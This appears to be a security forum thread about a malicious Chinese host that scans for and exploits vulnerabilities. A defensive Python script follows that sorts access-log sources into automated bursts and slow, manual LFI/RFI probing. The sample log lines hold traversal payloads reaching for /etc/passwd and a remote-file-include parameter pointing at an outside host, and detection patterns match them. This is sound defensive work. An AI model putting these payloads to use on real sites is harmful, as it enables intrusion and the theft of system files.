Tyrannosaurus reproduced fast and died young: A malicious host/IP/C&C from China, 2016 to present

pry0cc-

I have watched these operators pretty closely; the article itself is a living article and will be added to and edited, with new editions released.

They seem to be playing a smart game: the server scans perpetually for vulnerabilities and seems to change up to attack newer vulns much quicker…these are largely automated attacks…for instance, they still scan for Heartbleed and exploit those machines.

However, I have collected quite a few logs from clients that I cannot utilize due to NDA…what I can tell you is that there are human actors manually exploiting machines as well.

Logs will see the machine attack, and these will normally be automated attacks: bruteforce. Now that someone released that automated Metasploit release, I bet it did or does something similar: scan, detect, fire off some exploits, move on.

But then my clients' logs showed something else: more acute attacks against these hosts sometime later on…so we are talking attacks with a bit more finesse, like LFI/RFI, Curl or other manual bash/terminal commands utilized for offensive action, but with much more thought and precision, and much slower.

When these attacks succeeded, the attacker would immediately wget or git Masscan onto the machine, and then tunnel those scans through other hosts.

When I checked public abuse reports for the IP of the machines serving as the tunneling hosts, I almost always found earlier attacks against it or the others and reports of successful exploitation.

Most of the attacks that appeared to be human targeted high value targets such as .gov sites (which are excellent for carding) where they didn’t want to risk being loud.

What I can also tell you was that I tracked one of these actors for about the same length of time as I have watched this host: they never changed their user-agent or OS and they had a solid work ethic…they were grinding 6 to sometimes 12 hours a day and they had a solid grasp of Linux/Unix/Windows administration (most of their work occurred from common terminal utilities rather than using some garbage Kitploit toy to target RPC, HTTP methods/requests, interrogate Windows shares, etc…).

I will tell you what, everyone: this is why I will always release my research here first (and I have some projects I am excited to release later this year)…nowhere else can I conversate with folks like this.

maderas

2 Likes
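The post above describes two tiers of activity against the same hosts: noisy automated bruteforce/scan bursts, and later slow, hand-driven LFI/RFI probing from an actor who never changed user-agent. The script below is an added example (not maderas's code or logs) that profiles an Apache-style access log per source address and labels each source as a burst, as low-and-slow probing, or as unremarkable, so a defender reviewing client logs can separate the two patterns. All IP addresses, timestamps and log lines are constructed sample data, and the thresholds (10 requests at 1 req/s for a burst, 15 minutes of spread and 2 traversal/remote-include hits for low-and-slow) are assumptions to tune for a real environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Indicators of the LFI/RFI probing the post describes: directory traversal,
# a direct reach for /etc/passwd, or a query parameter pointing at a remote URL.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|/etc/passwd)', re.I)
REMOTE_INCLUDE_RE = re.compile(r'=(https?|ftp)://', re.I)

# Constructed sample data (not from the thread); all addresses are RFC 5737 test ranges.
# Tier 1: a tight burst of login attempts from one source with a tooling user-agent.
BURST_LINES = [
    f'203.0.113.5 - - [01/Mar/2017:02:00:{i // 4:02d} +0000] '
    f'"POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.9"'
    for i in range(12)
]
# Tier 2: four requests spread over two hours, one browser UA, probing page= for LFI/RFI.
SLOW_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
SLOW_LINES = [
    f'198.51.100.7 - - [01/Mar/2017:02:10:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "{SLOW_UA}"',
    f'198.51.100.7 - - [01/Mar/2017:02:52:00 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "{SLOW_UA}"',
    f'198.51.100.7 - - [01/Mar/2017:03:40:00 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "{SLOW_UA}"',
    f'198.51.100.7 - - [01/Mar/2017:04:31:00 +0000] "GET /index.php?page=http://203.0.113.9/t.txt HTTP/1.1" 200 310 "-" "{SLOW_UA}"',
]
# An ordinary visitor, for contrast.
NORMAL_LINES = [
    '192.0.2.10 - - [01/Mar/2017:02:30:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 Chrome/56.0"',
    '192.0.2.10 - - [01/Mar/2017:02:30:05 +0000] "GET /about.html HTTP/1.1" 200 3100 "http://example.test/" "Mozilla/5.0 Chrome/56.0"',
]
SAMPLE_LOG_LINES = BURST_LINES + SLOW_LINES + NORMAL_LINES


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = unquote(rec["path"])  # decode %2F etc. so encoded traversal is caught
    return rec


def is_suspicious_path(path):
    """True for traversal or remote-include patterns in an already-decoded path."""
    return bool(TRAVERSAL_RE.search(path) or REMOTE_INCLUDE_RE.search(path))


def profile_sources(lines, burst_min=10, burst_rate=1.0, slow_span=900, slow_hits=2):
    """Group requests by source IP and label each source's behaviour."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    profiles = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        span = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds()
        rate = len(recs) / max(span, 1.0)          # requests per second over the window
        user_agents = {r["ua"] for r in recs}
        suspicious = sum(is_suspicious_path(r["path"]) for r in recs)

        if len(recs) >= burst_min and rate >= burst_rate:
            label = "automated-burst"                # many requests, tightly packed
        elif suspicious >= slow_hits and span >= slow_span and len(user_agents) == 1:
            label = "low-and-slow"                   # few, spaced-out probes, constant UA
        else:
            label = "unremarkable"

        profiles[ip] = {
            "label": label,
            "requests": len(recs),
            "span_seconds": span,
            "rate_per_second": round(rate, 2),
            "distinct_paths": len({r["path"] for r in recs}),
            "user_agents": len(user_agents),
            "suspicious": suspicious,
        }
    return profiles


if __name__ == "__main__":
    for ip, info in profile_sources(SAMPLE_LOG_LINES).items():
        print(ip, info)
```

The two labels deliberately look at different things: the burst rule cares only about volume and timing, while the low-and-slow rule ignores volume and keys on the request content plus the single unchanging user-agent the post remarks on. Feeding it a real log means replacing SAMPLE_LOG_LINES with the file's lines and lowering or raising the thresholds to match normal traffic on that host.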